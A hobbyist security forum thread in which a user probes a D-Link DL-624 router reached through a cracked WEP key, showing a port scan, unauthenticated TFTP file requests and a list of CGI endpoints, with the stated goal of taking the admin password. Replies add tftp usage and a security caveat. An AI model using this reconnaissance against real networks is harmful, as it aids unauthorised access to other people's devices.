Results 1 to 8 of 8

Thread: Ap hack test DL-624 x-trem G

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Default Ap hack test DL-624 x-trem G

    So you crack a wep key like million of other users .... its fun , i guess, but now what?

    heres what, lets push this a little further shall we, so i use nesus to scan our new find home (192.168.0.1)

    well imagine that :

    rrac 5678/tcp open
    http 80/tcp open
    tftp 69/udp open <--- w00t
    general /icmp
    general udp
    Domain 53/udp
    domain 53/tcp
    general /tcp


    now doesn't seems like much but for a tiny little AP box it is. Now the question is ,what are we going to do to with this?

    so most of this is pretty useless or i haven't find out what to use it for or how to take advantage of it but the TFTP is nice so lets try

    bt~ # tftp 192.168.0.1
    tftp>mode
    Using netascii mode to transfer file.
    tftp>verbose
    Verbose mode on.
    tftp> get admin.img 192.168.0.100 (thats me)
    getting from 192.168.0.1:admin.img to 192.168.0.100 [netascii]
    Error code 1: file not found
    tftp>



    Ok so didn't get lucky, got and error on the file requested. But if u haven't notice by now we were able to request a file via tftp without even putting a login /pwd
    now this also work with uploading ur own file or whatever to the AP without login in.


    Anyway still working on trying to get a file list from my ap see what i can d/l haven't got any luck yet so if any of you have any output on this feel free to reply

    here a few more thing u can try
    192.168.0.1/natlist.txt
    192.168.0.1/public.js
    192.168.0.1/chklst.txt
    download dbgout.txt with tftp

    thats it for now if u know more let me know

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Don't you have to put the full path of the file in your command....

    tftp> get admin.img 192.168.0.100

    and make it...

    tftp> get C:\Documents and Settings\Xploitz\My Documents\admin.img 192.168.0.100

    No???

    Sorry...but I'm without my BT2 right now so I'm kinda shooting in the dark here. I could be completely wrong. I'm waiting on a HD caddy for my laptop from E-bay.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Default

    without specifying the loc it seem to put everything in my /root folder plus we're not attacking a client box we going after the AP itself so no such thing as c:/etcetc


    anyway to get a full list of avail file from the AP it selft .

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    HHmm...perhaps this will get you started...

    connect host-name [ port ] (port is optional....)
    mode transfer-mode



    Since IPv6 addresses already contain ":"s, the host should
    be enclosed in square brackets when an IPv6 address is used.
    Otherwise, the first occurrence of a colon will be inter-
    preted as the separator between the host and the filename.
    For example,


    [1080::8:800:200c:417A]:myfile

    Files may be written only if they already exist and are
    publicly writable.


    get filename

    get remotename localname

    get filename1 filename2 filename3 ... filenameN
    Get a file or set of files (three or more) from the
    specified remote sources. source can be in one of two
    forms: a filename on the remote host if the host has
    already been specified, or a string of the form:


    host:filename

    to specify both a host and filename at the same time.
    If the latter form is used, the last host specified
    becomes the default for future transfers. See the put
    command regarding specifying a host.


    I don't know if this helps you or not..but its all I could find on "Google" for ya.

    More is here...

    Code:
    http://www.scit.wlv.ac.uk/cgi-bin/mansec?1+tftp
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Default

    thk, yeah google been sorda useless in this case ... damn u google, i may just have to back up my Access point firmware and try to put it apart, to have a full file list of what could be done to it.

    The ultimate goal is once u have access to network is to rip the AP admin pwd. Once u control the AP u own the place.

    i got some response with some cgi [default value] from the browser.

    slowly making progress.

    here's what i got so far if anyone is interested.
    most of them get a 403 but its a working process

    /tools_ddns.cgi (ddnsEnable [1] ddnsEnable [0] ddns_server [] ddns_host [] ddns_user [] ddns_pass [] )
    /h_dhcp.cgi (edit_row [-1] del_row [-1] dhcpsvr [1] dhcpsvr [0] start_ip4 [100] end_ip4 [199] lease [] revdhcp [1] revdhcp [0] name [] static_ip4 [] mac1 [] mac2 [] mac3 [] mac4 [] mac5 [] mac6 [] dhcp [] clone [Clone] )
    /st_device.cgi (release [DHCP Release] renew [DHCP Renew] )
    /tools_misc.cgi (hEnable [0] hEnable [1] upnp [1] upnp [0] game [1] game [0] pptp_pt [1] pptp_pt [0] ipsec_pt [1] ipsec_pt [0] multicast_pt [1] multicast_pt [0] wanspd [1] wanspd [0] wanspd [2] )
    /load.cgi (file [] load [Load] )
    /tools_time.cgi (time_type [0] ntp [] interval [] time_type [1] year [] mon [] day [] set [Computer Clock] hour [] min [] sec [] tzone [] daylight [1] daylight [0] s_month [] s_week [] e_month [] e_week [] )
    /ping.cgi (ip [] ping [Ping] )
    /h_wan_dhcp.cgi (connType [0] connType [1] connType [2] otherType [] connType [3] connType [5] connType [4] host [go **** urself] mac1 [00] mac2 [13] mac3 [46] mac4 [a3] mac5 [27] mac6 [17] clone [Clone MAC Address] dns1 [0.0.0.0] dns2 [0.0.0.0] mtu [1500] )
    /restore.cgi (restore [Restore] )
    /restart.cgi (restart [Reboot] )

    and other problem is the tftp connection doesn't have a DIR or listing of available files. (this should be solve soon) .

    than again just for the record those may not work on all manufacturer those test are perform on a DL-624 x-trem G route. I may just plug my DL-514 and Netgear one after seen if i can find anything. anyway ill keep working on it.

    Be patient the universe didn't get created over night (altho ther is a theory about a big bang)

  6. #6
    Junior Member
    Join Date
    Dec 2007
    Posts
    30

    Default

    did you ever get any farther on this?

  7. #7
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    This is interesting but since it's a 192.168.x.x address an attacker would have to be on your network to execute any attack. Assuming you've properly secured your AP it should be exceedingly difficult for someone else to become part of your network, especially since this device offers LEAP & Radius.

    You could download and unpack the firmware from D-Link to see what files are there, though that might be considered reverse engineering and could result in your violating the DMCA or some License with D-Link. (IIRC D-Link likes to use ARJ compression for it's Firmware)

    It might be intersting to know if you can get NATLIST.TXT or CHKLST.TXT via tftp.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Default

    Still working on it , withinthe next week or so i should have the full diclo ready to post, stay tune

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •